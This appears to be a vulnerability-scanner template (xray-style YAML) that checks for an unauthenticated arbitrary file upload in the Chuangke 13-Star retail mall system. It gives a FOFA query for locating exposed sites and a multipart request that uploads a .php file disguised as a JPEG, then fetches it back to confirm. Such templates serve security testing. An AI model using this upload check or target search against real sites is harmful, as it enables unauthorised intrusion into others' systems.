Vulnerability Description
Chuangke 13-Star Retail Mall System (创客13星零售商城系统): front-end arbitrary file upload vulnerability
fofa:"/Public/Xin/static/css/iconfont.css"
id: chuangke-shangchuan-fileupload

info:
  name: 创客13星零售商城系统前台任意文件上传漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    创客13星零售商城系统前台任意文件上传漏洞
    fofa:"/Public/Xin/static/css/iconfont.css"
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzODY2ODA0OA==&mid=2247485436&idx=2&sn=c39a8b216a2be815a641702c1c24b99d
  tags: chuangke,fileupload
  created: 2025/03/19

set:
  randstr: randomLowercase(8)
  rboundary: randomLowercase(8)

rules:
  # r0: upload a marker file and read the stored path from the "re" field of the response
  r0:
    request:
      method: POST
      path: /Login/shangchuan
      headers:
        Content-Type: multipart/form-data; boundary=--------{{rboundary}}
      body: |
        ----------{{rboundary}}
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: image/jpeg

        <%out.println("{{randstr}}");%>
        ----------{{rboundary}}--
    expression: response.status == 200 && response.body.bcontains(b'code') && response.body.bcontains(b'"re":')
    output:
      search: '"\"re\":\"(?P<re>.*?)\"".bsubmatch(response.body)'
      # strip the JSON backslash escapes from the returned path
      re: replaceAll(search["re"], "\\", "")
  # r1: fetch the returned path and confirm the random marker is served back
  r1:
    request:
      method: GET
      path: "{{re}}"
    expression: response.status == 200 && response.body.bcontains(bytes(randstr))
expression: r0() && r1()